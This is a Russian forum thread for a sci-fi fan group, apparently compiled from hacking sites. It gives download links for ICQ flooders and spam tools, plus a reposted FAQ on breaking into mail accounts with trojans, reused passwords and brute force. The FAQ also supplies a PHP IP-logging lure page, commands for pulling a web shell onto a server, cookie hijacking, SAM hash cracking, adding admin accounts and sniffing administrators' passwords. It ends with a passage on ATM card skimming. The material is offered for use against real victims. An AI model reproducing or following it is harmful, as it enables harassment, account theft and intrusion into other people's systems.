Значит так, товарищи ШурСтраКосы, две статьи выше - это было творческое вступление, авторские тренировки речи, а теперь я серьезно объясню смысл данного топика. Итак, каждый ШурСтраКос по определению крутой, как Аль-Асвад. НО! Крутость ШурСтраКоса измеряется по трем уровням:
1. Уровень физической силы.
2. Уровень интеллекта (сюда входят не только знания, получаемые вами в вузах, или умение правильно взорвать планету, но еще и уровень компьютерной образованности).
3. Внешние данные =)
4. Уникальная особенность (у каждого шурСтраКоса обязательно есть своя "изюминка", которая делает его уникальным).
Поговорим конкретно о втором пункте.
Каждый, несомненно, считает себя самым умным. Каждый ШурСтраКос должен не только хорошо учиться в школе/универе =), но еще и быть в теме его "профессиональных" тем. В нашем случае это темы научной фантастики. Но какая же наука и космотехнологии могут быть без универсального изобретения манчкинов Вселенной - компьютеров? Компьютерная образованность - важнейшая составляющая крутости ШурСтраКоса. А теперь представьте себе Дарта Вейдера, который не умеет ломать Мэйл.Ру (Голонет.Ру). Представили?
Ну какой же ШурСтраКос может быть суперкрутым, если он ничего не смыслит в веб-хакинге? Теперь у всех ШурСтраКосов есть уникальный шанс повысить уровень свой мегакрутости, ознакомившись со статьями юзеров Античата.
В эту тему будут выкладываться самые интересные и наиболее полезные статьи. Удачи вам в повышении уровня компьютерной грамотности! =)

Flood - spam ICQ
(посвящается Ревану)

ICQFlooder by l-l00k

Программа служит для флуда icq-номера недруга, работает без проксей. Больше 70 номеров лучше не загружать, иначе, когда все номера онлайн, будут сильные тормоза. Номера должны быть в формате uin;pass.

Добавлено:

    * Сделано 2 режима флуд-атаки.
    * All - режим, в котором раньше работал флудер, то есть шлет по сообщению от каждого активного номера, затем отдыхает таймаут, потом опять шлет.
    * One - режим, в котором флудер шлет одно сообщение, ждет таймаут, шлет еще одно сообщений и т.д.
    * Время теперь указывается в милисекундах.
    * Добавлена возможность обхода защиты от спама, достаточно поставить галочку на "Spam protection" и указать ответ на защитный вопрос, затем нажать на "Send"; каждый из номерков обойдет защиту, и после этого уже пойдет флуд.
    * Флудер теперь определяет номера с неправильными паролями (BAD).

Скачать:
http://depositfiles.com/ru/files/x6a7eo2rj

ICQ flooder FBK3.0 private

    * успешно грузит до 1000 номеров.
    * отображает, что пишут на номера флуда (обычно там: "Аааа! Перестаньте!...").
    * показывает, сколько сообщений точно получит жертва.
    * отсеивает сдохшие потоки.
    * показывает, сколько сообщений в секунду получает жертва.
    * регулируемая скорость загрузки номеров и скорость отправки сообщений.
    * отправляет текстовое сообщение.
    * отправляет шум (случайный набор байтов) указанной длины.
    * отправляет по строчке из текстового файла.
    * хорошор мучает пользователей QIP, если грузануть более сотни номеров и выставить интервал отправки 2000.
    * Написан с нуля на Visual Basic.
    * 50 номеров для флуда в комплекте (по желанию).
    * QIP валит!

Скачать:
http://depositfiles.com/ru/files/vof91e4sl

[Perl] Fl00d icq by C!klodoL

Флудер icq, реализованный на Perl-e.

Скачать:
http://depositfiles.com/ru/files/8s8ssrs16

ICQ flooder 0.6 Private

[Возможности]:

    * Флудер ICQ интернет-пейджеров.
    * Работает шоколадно...
    * Возможно поставить время перерыва между сообщениями.
    * Возможность выбора сообщений - авторизация, простые сообщения и сообщения вида "Вас добавили" !!!

Скачать:
http://depositfiles.com/ru/files/vg22rvp6l

.B. Flooder version 0.2 (beta)

Возможности:

    * Messege type.
    * Сообщение.
    * Авторизация.
    * "Вас добавили".
    * В авторизации отказано.

Files:
Загрузка из *.txt файлов:

    * uin;pass.
    * text.

Счетчик:

    * Отосланных сообщений.
    * Принятых сообщений.
    * Загруженных номеров.

Трей:

    * Сворачивание в трей.

Connect options:

    * Настройки подключения.
    * Flood options.
    * Connect pause.
    * Send pause.
    * Super flood.

Скачать:
http://depositfiles.com/ru/files/u0cmhsv3b

IMtale 4.1.2

Представляет из себя программу для рассылки сообщений по номерам icq. Программа работает на самом последнем протоколе icq. Отличительная особенность программы - простота в использовании и максимальная автоматизация рутинных задач рассылки по номерам icq. Программа сочетает в себе простоту и оптимальность. Вам не нужно ломать голову по поводу того, как можно найти больше пользователей, какие дополнительные параметры поиска указывать, а какие нет, как избежать различных серверных лимитов на отправку и поиск. Интеллектуальный алгоритм программы сам все предусматривает. Программа поддерживает русский и английский языки.

Скачать:
http://depositfiles.com/ru/files/ra0o0eitq

OSCAR Flooder

Поддерживает:
Отправку сообщений на...

    * Один номер.
    * Список.
    * Диапазон номеров.

Типы сообщений:

    * Обычное.
    * Запрос авторизации.
    * Отказ авторизации.
    * Одобрение авторизации.
    * url-сообщение.
    * "Вы добавлены".

Скачать:
http://depositfiles.com/ru/files/4l6fubk91

Flisis-flooder.v2.8.1.with-proxy

То же самое, что и выше, но только с проксями.

Скачать:
http://rapidshare.com/files/28951623/Fl … -proxy.rar

Kyle Katarn Flooder

Удобный и простой флудер/спамер, не требующий заливки на хост!
К сожалению, не может похвастаться тысячами сообщений в секунду, но потрепать нервы зафлуженному ламеру или устроить спам-рассылку по диапазону номеров позволит.

Скачать:
http://www.rapidshare.ru/926296

Энвич, "пустотой" спамить тоже можно - просто забей в текстовое сообщение кучу пробелов и копипасти "пустоту", пока не надоест.

Так, граждане юзвери, продолжаем разбирать FAQ для тех, кто решил стать ШурСтраКосом-кулхацкером =). ЧаВо скопированы с xakep.ru. На десятом вопросе мне надоело исправлять ашибки и очепятки, а также добавлять отсебятину, так что читайте, как есть. . Успехов.

FAQ по взлому в Cети

Как взломать мыло на mail.ru и yandex.ru?

Наверное, я тебя разочарую, но почту mail.ru или yandex.ru взломать нельзя. Почему?

http://mail.ru, пожалуй, самая популярная почтовая система. Администрация серверов mail.ru имеет огромные доходы с рекламы, они завлекают пользователей рекламой в печатных изданиях и по телевидению, и неужели ты думаешь, они пожалеют денег на хороших специалистов по безопасности? Забудь об этом. И, самое главное, никогда не ведись на предложения «взломать любое мыло на mail.ru за $5» - тебя самым наглым образом кинут. Способов дурачить лохов куча. Самый распространенный – «найден секретный почтовый робот, сообщающий пароль от любого ящика, если прислать ему свой пароль», также предлагают различные проги для взлома ящика «100% работающие и всего за $25».

Однако стоп, не все так печально. Что? Я говорю, почту на mail.ru нельзя взломать? Шутка

Если нельзя найти баг в самом сервере, почему бы не найти его в голове владельца ящика? Итак, внимание, самые распространенные способы взлома почты на mail.ru. Само собой, они катят и для других почтовиков.

Что ж, приступим.

1. Первым делом стоит попробовать подобрать ответ на секретный вопрос. Вероятность мала, но попробовать стоит. К примеру, ответом на "любимое блюдо" чаще всего бывают "шашлык" или "пельмени".

2. Допустим, мыло vasya-pupkin@mail.ru. Ищешь в поисковиках (достаточно Яндекс, Гугл и Рамблер) все сайты, где он засветился, выписываешь все ники, под которыми он гуляет по Сети, и все сайты, на которых он зарегистрирован под этими никами. Конечно, если логин типа alex, то ничего не выйдет, нужен уникальный.

После этого исследуешь все найденные сайты. Если человек давно существует в Сети, более чем вероятно, что год-другой назад он зарегился со своим паролем на каком-нибудь superforum2.h14.ru, взломать который не составит большого труда. Пароль от аккаунта на форуме часто совпадает с паролем от мыла.

3. Отсылаем человеку троянца в надежде, что он ламер ушастый и клюнет на superFoto.jpg.............exe. Отослать можно запароленный архив csmaps.zip от имени его друга, сказав, что там новая крутая карта CS. Пароль указать в письме. Как правило, юзеры проверяют запароленный архив антивирем, а потом без палева открывают его и запускают exe-шник . Для этих целей вполне подойдет троян Pinch.

4. Допустим, ничего не помогло. Человек следит за мылом, меняет пароли и т.д.

Не все потеряно. Снова идем на страницу вспоминания пароля mail.ru и ищем, нет ли там ретрива пасса на мыло. Есть? Тогда можно попытаться узнать второе мыло и повторить всю процедурку сначала. Возможно, его человек охраняет не так ревностно.

Как взломать мыло на менее защищенных почтовиках: newmail, hotmail…?

1. Приятней всего найти багу самому, например, уязвимость в веб-интерфейсе: возможно, где-нибудь спряталась XSS или даже SQL-inj.

2. Если админы до сих пор не почесались сделать защиту от брута, можно попытаться сбрутить пароль. Для этого есть тулзы, например, старый добрый Brutus AET под Windows, либо THC-Hydra под никсы.

3. Использовать методы социнженерии, описанные для mail.ru.

Как взломать сервер ***? Вы же можете помочь?

Каждый взлом – процесс творческий. И каждый ломает так, как ему нравится. Но в первую очередь, конечно, стоит досконально изучить «подопытный» сервер. Какая на нем стоит система, какие сервисы, следит ли админ за патчами и обновлениями и т.д. При достаточном опыте хакер может узнать все это имея лишь браузер и telnet-клиент, начинающему же проще всего воспользоваться сканером уязвимостей. Например, SSS-сканером под Windows, или nmap под *nix.

Сканер нашел уязвимость и радостно сообщил об этом? Не торопись мчаться в скайп ШурСтраКосов с вопросом «nmap выдал мне ***, что с этим делать» - тебя скорей всего пошлют. Вбей ключевые слова из фразы об уязвимости в поисковик (лучше google).

Если же на сервере стоит старая бажная версия одного из сервисов, пробуй найти под нее сплойты.

Как пользоваться сплойтами?

Очень просто. Запустить сплойт с нужными параметрами, а он все сделает за тебя. Проблема в том, что большинство сплойтов в открытом доступе только в исходниках, то есть, обычный *.txt-файл с кодом на C++ или perl. Если это C++, то сплойт придется предварительно скомпилировать. Сплойты на perl или php компилировать не надо, они исполняются прямо на сервере. Если у тебя есть shell, достаточно залить туда файл и запустить. Если ничего кроме твоей родной Windows у тебя нет, придется скачать и установить один из эмуляторов. Например, cygwin и activePerl. Можно, в принципе, воспользоваться денвером (denwer.ru), но тогда тебе, скорей всего, придется вручную добавить некоторые сетевые библиотеки, которые отсутствуют в конфигурации по умолчанию.

Помни, что большинство сплойтов в исходниках имеют «защиту от дурака», то есть специально сделанные синтаксические ошибки, поэтому если в программировании ты абсолютный ноль, придется искать уже исправленный рабочий сплойт.

Как скомпилировать сплойт под Windows?

Ну очень подробное руководство приведено тут: http://www.razrushitel.front.ru/complite.html

Как запустить сплойт под Windows?

Нажми WinKey + R (или Пуск -> выполнить), там cmd и нажми ENTER. Появится черное окошко, в котором и надо запустить твой сплойт. Передвигаться по директориям можно командой "CD имя директории", перейти с диска C: на диск D: можно командой CD /D D:
Список всех файлов и папок можно получить командой DIR. Другие команды узнаешь, набрав HELP.

Как запустить сплойт на шелле? У меня не получается.

Как правило, справка по использованию сплойта выдается при запуске его без параметров или с параметрами –-help или -h.

Как взломать сайт?

Может быть, ты будешь расстроен, но нет ни чудо-проги lomalka_saitov.exe, ни заклинания «сайт, взломайся», ни слова, которое нужно ввести на сайте, чтобы он взломался. Даже сам Аль-Асвад не владеет Сферой Сайтоломания, несмотря на всю свою манч-крутость.

Опыт, знания и упорство – вот три кита, на которых держатся самые успешные взломы. Почитай описания уже совершенных взломов, которых в Сети просто до кучи, там все подробно описывается. Прочти 5-10 таких описаний, и получишь представление о том, как взломать сайт. Хотя бы примерно

Могу лишь дать несколько рекомендаций:

    * Очень важно, на каком сервере находится сайт-цель. Возможно, админ не следит за сервером и вовремя не патчит систему. Тебе надо быть в курсе всех последних уязвимостей, чтобы сразу это заметить. Узнать информацию о сервере можно, например, на wwwwhois-service.ru.
    * Если это сервер крупной хостинг-компании, вроде valuehost, будь уверен - взломать сервер не получится, и натравливать сканер в надежде найти бажный сервис практически не имеет смысла. В этом случае разумней всего начать с поиска багов на самом сайте - возможно ошибку допустили программисты.
    * Начни с поиска установленных «сторонних» скриптов: форумов, чатов, гостевых и т.п. А может быть и сам сайт – это какой-нибудь публичный веб-портал вроде php-nuke. Тогда остается лишь узнать версию скрипта и проверить, не найдена ли в нем какая уязвимость.

Неплохая статья про взлом вебсайтов: wwwhackzona.ru/hz.php?name=News&file=article&sid=2045

Какие уязвимости чаще всего встречаются на сайтах?

Основные уязвимости - это, несомненно:

1. SQL-инъекции (SQL-injection).

SQL-инъекция относится к вставке метасимволов SQL в вводимые пользователем данные, что приводит к изменению запроса базе данных. Как правило, взломщики для начала определяют уязвимость сайта к такой атаке (для этого в форму или в один из параметров url посылается знак одинарной кавычки). Последствия выполнения такой атаки на уязвимом сайте могут находиться в пределах от появления детального сообщения об ошибке, что раскрывает злоумышленнику используемую на сайте технологию, до доступа к закрытым областям сайта или выполнения на сервере произвольных команд операционной системы.

2. Межсайтовый скриптинг (XSS).

Принцип работы межсайтового скриптинга основан на внедрении злонамеренного кода в HTML код страницы, что приводит к выполнению такого кода на машине жертвы, то есть броузером. Чаще всего применяется в гостевых книгах, чатах и форумах.

Также XSS представляет опасность, если произвольный код отображается на страницах с расширением shtml, т.е. сервер поддерживает технологию SSI (Server Side Includes). Это может привести к чтению или выполнению произвольных файлов на сервере.

3. Прочие баги в головах программистов

Ошибки в самом сайте, из-за которых на сайте могут появиться серьезные бреши в безопасности. Например, адрес сайта содержит что-нибудь вроде «?file=», допустим site.ru?show.php&article=../index.asp, но, само собой, это лишь один из вариантов.

Как взломать ICQ?

Неплохой FAQ по ICQ-хакингу для начинающих приведен здесь:

http://www.web-hack.ru/articles/articles.php?go=13

Как узнать ip сервера, например yandex.ru?

Самый быстрый способ – набрать в командной строке «ping yandex.ru»

Ты увидишь что-нибудь вроде

64 bytes from 213.180.204.11: icmp_seq=0 ttl=41 time=60.988 ms

213.180.204.11 – это и есть ip-адрес сервера.

Как узнать ip юзера в сети?

1. Общаться с ним по аське. Многие icq-клиенты, такие как Miranda IM, SIM и т.п., показывают ip в информации о пользователе. Если не хотите качать продвинутые клиенты, можно воспользоваться специальными программами типа uin2ip, или патчами для стандартных версий ICQ.

Кроме того, на сайте wwwleader.ru есть UIN Locator. Вводишь UIN получаешь IP, главное чтобы чел был не в оффлайне.

2. Добиться того, чтобы пользователь прислал тебе письмо. Вне зависимости от того, пользуется ли он веб-интерфейсом, или же почтовиком вроде TheBat!, в заголовках сообщения будет указан его ip. В TheBat! Заголовки можно прочитать, нажав правую кнопку и выбрать в контекстном меню «показывать заголовки RFC-822». Ищи текст «Received: from», который находится ближе всего к телу письма – сразу за этими словами будет ip-адрес отправителя.

3. Узнать на каких irc-каналах сидит юзер и посмотреть там.

4. Если ничего не помогает, но очень хочется, не отчаивайся.

Если у тебя есть хостинг, на котором можно исполнять perl/php (если нет, можно бесплатно зарегистрировать, например, на h15.ru), то вот еще один способ – выбираешь страничку, на которой есть фотография какого-нибудь случайного человека (допустим, http://masters.donntu.edu.ua/2001/ggeo/pavelchak/), полностью копируешь HTML-код в новый файл, например, info.html и сохраняешь его на своем сайте. Рядом создаешь еще один файл index.php, следующего содержания:

<?
  $message = "Date: " . 
  date("d.m.Y H:i:s") . 
  "\nIP: " . $REMOTE_ADDR . 
  "\nServer: " . 
  gethostbyaddr($REMOTE_ADDR) . 
  "\nHTTP_X_FORWARDED_FOR: " . 
  $HTTP_X_FORWARDED_FOR . 
  "\nPage: " . 
  $SERVER_NAME . 
  $REQUEST_URI . 
  "\nQuery: " . 
  $QUERY_STRING . 
  "\nComing from: " . 
  $HTTP_REFERER . 
  "\nBrowser: " . 
  $HTTP_USER_AGENT . 
  "\nFilename: " . 
  $SCRIPT_FILENAME;
  mail("admin@mail.ru", 
  "Requested ip", $message, 
  "From: admin@mail.ru\nContent-Type: text/plain; charset=windows-1251", 
  "-fadmin@mail.ru");
  $ = fopen("log.txt", "a");
  fwrite($fp, str_replace("\n", "\t", $message) . "\n");
  fclose($fp); 
  include("fil.html");
?>

Само собой, мыло admin@mail.ru необходимо заменить на твой почтовый ящик. Эта страничка (index.php) визуально не будет отличаться от оригинала, но логи с ip и параметрами системы юзера отошлются тебе на почту и продублируются в лог-файл (проверь, что у этого файла есть права на запись, например 666, или 777). Кроме того, если человек находится в локальной сети, ты получишь еще и его локальный ip, а если ходит через прокси, то поимеешь ip как прокси, так и его собственный.

Теперь твоя задача – заманить юзера на эту страничку. Само собой, не стоит просто присылать ее по аське. Мой любимый способ такой: «Привет [тут имя того, чей ip хочешь узнать], ты помнишь Таню ([а вот тут как раз линк на твою страничку с фоткой])? Она сказала, ты можешь помочь мне с дизайном (взломом, разведением кактусов и т.п).

Действует 100%

Я знаю ip компьютера/юзера, как его взломать?

IP – это уникальный адрес компьютера. Так же как для рассылки корреспонденции у каждого жителя планеты должен быть уникальный домашний адрес (Страна, город, улица, дом, квартира), каждый компьютер должен иметь свой уникальный ip-адрес, чтобы другие компьютеры в сети смогли передать ему информацию.

Поэтому твой вопрос равносилен вопросу «как взломать квартиру друга, если я знаю его домашний адрес».

Надеюсь, ты понимаешь, что просто знание ip недостаточно.

Подробнее про ip-адрес, можно прочитать тут: http://www.sluh.freenet.kz/p8/12.html.

Как скрыть свой ip?

Если ты хочешь скрыть, т.е. поменять свой IP, то самый простой способ это сделать – воспользоваться анонимными прокси. Однако, не все так просто.

Обычно при обращении к сайту веб-серверу передаются два IP-адреса: REMOTE_ADDRESS и HTTP_X_FORWARDED_FOR.

REMOTE_ADDRESS – это, и есть твой ip-шник: по которому банят, который видят админы и т.п.

HTTP_X_FORWARDED_FOR - это дополнительный параметр, в котором хранится твой реальный IP. Например, если ты в локальной сетке, тут будет твой внутренний адрес.

Имей ввиду, что даже если если ты ходишь в сеть через прокси, и твой IP сменился на IP проксика, в HTTP_X_FORWARDED_FOR по-прежнему будет светиться твой старый IP!

Поэтому для полной анонимности нужно выбирать только те прокси, которые помечены как high anonymous или elite proxy. Эти сервера не передают никакой информации о твоем старом IP и полностью конфиденциальны. Если, конечно, это не сервера агентов спецслужб

Как не спалиться при взломе?

Лазить по сети только через анонимные прокси, чтобы не светить свой ip. Заметать следы… Для этого используй какой-нибудь логклинер типа vanish2.

Где взять анонимные прокси и что с ними делать?

Списки анонимных прокси:

wwwsamair.ru/proxy
wwwweb-hack.ru/proxy
wwwfreeproxy.ru/ru
wwwproxy4free.com
wwwanonymizer.com
wwwanonymizer.ru

Пара прокси-чекеров:

wwwchecker.freeproxy.ru/checker/
wwwsamair.ru/proxy/proxychecker/

Юзаем прокси так:

Опера: Инструменты -> Настройки (или сразу Ctrl+F12) -> Сеть -> Прокси-серверы. Пишем тут ip адрес и порт проксика, нажимаем OK. далее нажимаем F12 и ставим галочку около Enable Proxy Servers
IE: Сервис -> Свойства обозревателя -> Подключения->Настройка LAN
Если через проксик нужно пустить весь трафик, либо программу, которая не поддерживает настройку прокси-соединения (например, TheBat!), пользуйся SocksChain.

Что делать с паролем такого вида: d8578edf8458ce06fbc5bb76a58c5ca4?

Ну, во-первых, это не пароль, а md5-хеш от пароля. Расшифровать его проще всего прогой md5Inside, или ее более продвинутым вариантом PasswordsPro. Есть также консольная программка JohnTheRipper (JTR)

Как юзать JohnTheRipper (JTR)?

wwwinattack.ru/search.php?s=john

Как юзать nmap?

wwwinattack.ru/article/48

Как мне закачать что-нибудь на сервер?

lynx: lynx -source "yoursite.com/shells/shell.php" > shell.php

links: аналогично lynx

wget: wget -O shell.php yoursite.com/shells/shell.php

GET: GET yoursite.com/shells/shell.php > shell.php

fetch: fetch -o shell.php yoursite.com/shells/shell.php

curl: curl --output shell.php yoursite.com/shells/shell.php

Мне удалось стянуть cookies с чужого компа, что с ними теперь делать?

Ну, во-первых, не радуйся слишком – куки не настолько конфиденциальная информация, как, к примеру, пароль от почты или от инета. Но кое-что, все же сделать можно.

Дело в том, что на некоторых серверах есть механизм авторизации пользователя на длительный срок, и информация об этой авторизации хранится именно в cookies. Ты можешь сделать следующий финт ушами: просто подменить свои куки куками юзера и, если программисты не предусмотрели такую подлянку, запросто войти под чужим логином, сайт тебя сам опознает.

Чаще всего такие фишки катят на форумах, но не на всех.

Это не проканает, если:

    * срок авторизации уже закончился
    * есть привязка к ip-адресу
    * в cookies вообще не хранится конфиденциальная информация

Но перед тем, как производить все эти манипуляции, обязательно просмотри, что же, собственно, есть в куках – возможно, там пароль в открытом виде, или же хеш пароля. Тогда, даже если истек срок действия cookies, есть шанс его расшифровать и зайти под чужим логином. В Опере cookies можно просматривать и редактировать через меню Настройки -> Дополнительно -> cookies.

Если у тебя IE, то есть Internet Explorer, придется воспользоваться дополнительными средствами, например программой IECookiesView.
FAQ по Windows и взлому ПК

Я запускаю консольную программу, появляется черное окошко и исчезает. Что не так?

Сначала надо запустить командную строку Winodws: WinKey + R (или Пуск-> Выполнить), там набери cmd и затем ENTER. Появится черное окошко, куда и надо вводить команды.

Я знаю команду net send. А есть еще какие-нибудь интересные команды?

Список основных команд Windows можно получить, набрав HELP в командной строке. Справка по конкретной команде вызывается так: HELP <имя команды>. Например, HELP LABEL.

Наиболее полезные команды:

CMD
Запуск командной строки

NET SEND
отправка сообщения другому компьютеру в сети

NET START/STOP
запуск/остановка служб

NETSTAT
вывод активных подключений

NET USER username /ADD
заведение нового пользователя

NET USER username newpassword
смена пароля пользователя username

NET LOCALGROUP Администраторы
вывод всех Администраторов в системе

NET LOCALGROUP Администраторы username /ADD
добавление юзера username в группу Администраторов

LABEL
смена метки диска

PING xakep.ru
проверка доступности хоста и времени его отклика

TRACERT xakep.ru
путь прохождения пакетов в Сети и время отклика каждого сервера

IPCONFIG /ALL
сетевые настройки – IP адрес, DNS, WINS и DHCP сервера и прочее

IPCONFIG /FLUSHDNS
очистка локального DNS-кэша

TASKLIST
вывод всех запущенных процессов

TASKKILL /F /IM notepad.exe
убьет процесс notepad.exe

SHUTDOWN –S
выключение компьютера

SHUTDOWN –R –T 10
перезагрузка через 10 секунд

SHUTDOWN –A
отмена остановки системы (при перезагрузке, выключении и т.п.)

FTP
запуск консольного FTP-клиента

TELNET xakep.ru 80
подключение к 80 порту сервера xakep.ru

Как посмотреть, какие порты у меня открыты?

В командной строке выполнить netstat –a

Как в Windows закрыть определенный порт?

Что такое открытый порт? Это просто ожидание соединения. Если какая-либо программа или сервис ждет входящее подключение на какой-нибудь порт, ты видишь, что этот порт «открыт». Поэтому никакого встронного «рубильника» в Windows, естественно, нет, потому что непонятно, что, собственно, закрывать. Единственный способ прикрыть порт – оборвать соединение и закрыть сокет. Вполне логично, что сделать это можно двумя способами – вырубить соответствующий сервис или программу, либо воспользоваться файрволлом.

У меня в системе куча открытых портов. Это троянцы?

Не исключено, хотя Windows открывает много портов в служебных целях.

Посмотреть, к каким службам Windows относятся определенные порты, можно тут:

http://spy.h12.ru/hack.php?ports

Как взломать ZIP / RAR / SFX архив?

Работу алгоритма, который применяется в RAR и ZIP архивах, в двух словах можно описать так: содержание архива перемешивается с использованием определенного ключа (т.е. пароля). Поэтому даже зная сам алгоритм, но не имея ключа, расшифровать данные невозможно. Так же, как в уравнении 100 – X = Y получить Y, не зная X нельзя, не смотря на то, что алгоритм вычитания одного числа из другого тривиален.

Единственный способ – перебирать все возможные ключи по очереди и смотреть, подходит он к архиву, или нет.

Надо заметить, что шифрующая функция довольно навороченная, особенно в RAR-архивах, поэтому перебор происходит ужасно медленно, даже по сравнению с MD5.

Поэтому подобрать 6-изначный и более пароль к RAR-архиву уже практически нереально в домашних условиях, это займет месяцы и годы. Однако здесь могут реально помочь большие словари для брута. Возможно, там пароль «administrator», который, конечно же, есть в любом словаре

Наиболее популярные программы для взлома архивов:

Advanced ZIP Password Recovery (ZIP)
Rar Password Recovery (RAR)

Как взломать пароль на BIOS?

Если ты случайно забыл пароль на BIOS от своего компьютера, или от компьютера соседа, есть куча способов исправить это недоразумение. Узнать о них можешь тут:

wahack.org.ru/chd/?sec=lib&ver=html&p=2&text=26
wwwfssr.ru/hz.php?name=News&file=article&sid=4222

Где в Windows хранятся пароли юзеров?

В Windows 98 пароли хранятся в C:\Windows\***.pwl, где вместо *** - имя пользователя.

Расшифровать их можно программой RePWL.

В Windows NT/2000/XP пароли находятся в файле SAM:

C:\Windows\System32\config\SAM. Доступ к файлу имеет только Windows, поэтому даже находясь под Администратором, скопировать этот файл не выйдет – необходимо грузиться с DOS-дискетки, или другой ОС.

Для брута учеток используется SamInside, или ее более новая версия – InsidePro. Кстати, эта программа позволяет вытащить данные SAM файла непосредственно из системы, если у вас есть права администратора.

Для подбора паролей, скорей всего, помимо SAM файла понадобится еще и System.

Как узнать пароли или повысить права с гостя до админа в Windows XP?

1. У тебя есть права администратора

1.1. Запускаешь InsidePro, там в меню есть опция «импорт учеток с локальной машины» - получаешь хеши всех юзеров, осталось только расшифровать.

1.2. Меняешь любой пароль из командной строки:

NET USER username password /ADD
заведение юзера username с паролем password

NET USER username newpassword
смена пароля пользователя username на newpassword

NET LOCALGROUP Администраторы
вывод всех Администраторов в системе

NET LOCALGROUP Администраторы username /ADD
добавление юзера username в группу Администраторов

2. У тебя нет прав администратора, но есть физический доступ к компьютеру.

2.0 Во-первых, убедись, что у тебя из действительно нет: загрузись в Safe Mode (жми F8 при загрузке) и попробуй зайти под учеткой «Администратор». Очень часто на нее ставят пустой пароль, или что-нибудь вроде «a», «123», или «qwerty»

2.1 Если и правда нет, тогда грузись с DOS-дискетки, флешки, или загрузочного диска, забирай SAM и бруть его с помощью InsidePro.

2.2 Ищи локальный сплоит для повышения прав, и опять же становись админом.

2.3 Есть целый набор утилит для восстановления системы. Лучшая из них называется ERD Commander. ERD Commander 2005 можно скачать в p2p, найти его в Интернете проблематично. Поэтому могу предложить бесплатную альтернативу, всего несколько Мб. Там все подробно описано, как юзать и т.п. Программа представляет собой загрузочный диск, или дискетку, которые просто обнуляют пароль администратора. Достаточно вставить такой диск в дисковод и перезагрузить компьютер.

3. У тебя нет постоянного доступа к машине и/или нет возможности использовать все вышеперечисленные способы.

3.1 Запускай на компе кейлоггер, или вирус, который сможет стащить пароль, и зови админа «установить игрушку»

3.2 Используй сниффер для перехвата админского пароля - самый проверенный способ для школ и информационных классов: заходишь в биос, ставишь загрузку с флопика, грузишься с загрузочной дискеты. Затем кидаешь в папку автозагрузки админа прогу fucklogon, которая методом перехвата winapi снифает все пароли в лог файл... Ждёшь пару дней и читаешь логи, за два дня админ полюбой засветит свой пароль.

3.3 Попробуй проверить, как там с шарами: Набери в командной строке \\work10\C$, где work10 – имя машины в сети. Возможно, получится поиметь доступ к С-диску, а там уже проще – скажем, прописать что-нибудь в autoexec.bat, или в автозапуск и дождаться, пока винду перезагрузят.

Есть ли эмуляторы UNIX систем под Windows?

Конечно, есть. Для компиляции программ, или просто для знакомства с unix shell подойдет cygwin. Если под Windows хочется иметь полноценную UNIX-систему, рекомендую поставить виртуальную машину VMWare – вторая ось будет грузиться прям «внутри» Windows. Вполне полноценная система, в которой не страшно сделать «что-нибудь не то» - крах гостевой операционки в VMWare никак не повлияет на работу основной Windows.

Как можно соединить компьютеры по модему без Интернета?

http://phil.philka.ru/faq/serverconection.htm

Как бесплатно звонить на межгород через Интернет?

Поговорить с любым человеком, у которого есть Интернет, можно с помощью специальных сервисов. Самый популярный подобный сервис в России – Skype. Услуга бесплатная, однако, для этого другой пользователь тоже должен быть подключен к сервису SkyPE. Для того, чтобы звонить на городской телефон, придется заплатить.

Иногда междугородние и международные звонки через Интернет можно делать бесплатно. Как - описано здесь:

http://www.xakep.ru/post/40632/default.asp

Как оптимизировать и ускорить работу Windows XP?

Отличное руководство по настройке Windows XP: http://phil.philka.ru/faq/setupxp.htm

ШурСтраКос - это не только веб-кулхацкер, но еще и кулфрицкер =). Вашему вниманию представляется статья на тему фрикинга.

Секреты взлома банкоматов

Автор статьи - ph1l1ster с xaker.ru

Intro.

Банковские автоматы и кредитные карточки уже давно появились на улицах больших городов и постепенно начинают входить в нашу жизнь. Что есть банкомат с точки зрения хакера? Правильно, источник халявы и быстрого способа заработать немного карманных деньжат. Ведь если украсть десяток-другой долларов, кто будет вас искать?

По словам банковских работников, оправданными с финансовой точки зрения будут поиски похитителя, умыкнувшего в свой карман по крайней мере 300 вечнозеленых.

Уменьшим эту цифру вдвое для безопасности и примем полученные полтораста баксов в качестве того потолка, заходить за который не стоит даже в том случае, если очень-очень хочется купить новый микропроцессор или материнскую плату, а к ним быстрый модем впридачу.

Впрочем, с юридической точки зрения похищение даже одного доллара - кража. Поэтому, прежде чем отправляться к ближайшему банкомату с кусачками и отверткой, запаситесь на всякий случай парой адвокатов и захватите Шварценеггера на тот случай, чтобы немножко попридержать службу безопасности банка, пока вы будете сматывать удочки. Для того чтобы получить деньги, мало найти потерянную карточку и вставить ее в прорезь автомата. Нужно ввести с клавиатуры определенный код, на карточке не написанный и хранящийся у клиента в голове

Сама по себе карточка без него бесполезный кусок пластика. К тому же ее бывший владелец, как только обнаружит пропажу, немедленно позвонит в банк, и у карточки будет выставлен знак изъятия. Другими словами, она исчезнет в недрах банкомата и уже больше никогда не попадет к вам в руки. Следовательно, нужно не только найти карточку, но еще и подсмотреть вводимый ее владельцем пароль и снять со счета требуемую сумму еще до того, как тот обнаружит пропажу.

Впрочем, если мы уж сумели подсмотреть пароль, то и карточку воровать совершенно необязательно. Достаточно ее считать. Что и сделали в свое время ребята из Эстонии. История шумная и известная почти каждому кардеру. В дорогих ресторанах официант, пока нес карточку клиента, успевал ее считать портативным устройством размером с пачку от сигарет, изготовленным из обычной магнитофонной головки, батарейки, усилителя сигналов и записывающего устройства. Ошибка горячих эстонских парней заключалась в том, что они грабили часто и помногу. Другими словами, в жадности.

А вот в другой истории злоумышленникам повезло больше. Как-то раз на малолюдной улице одного небольшого городка появился новый банкомат. Естественно, нашлись такие, что пожелали им воспользоваться. Опускают в него карточку, вводят нужный пароль. Ждут себе ждут, а банкомат им отвечает: извините, мол, нету денег или связи - в общем, выдает неподозрительное объяснение невозможности выдачи денег. В банке долго понять не могли - как совершается кража? Почему-то никому и в голову не могла придти мысль, что этот банкомат-то липовый и установлен злоумышленниками специально для чтения карт и запоминания паролей. Позже его демонтировали, но злоумышленников, кажется, так и не нашли. За полтора года (а именно столько он умудрился простоять) кардеры перекачали на свой счет немалую сумму. Однако же рядовой хакер скорее найдет оброненную кем-то впопыхах тысячедолларовую купюр, чем завалявшийся на свалке банкомат. Может быть, есть способ попроще?

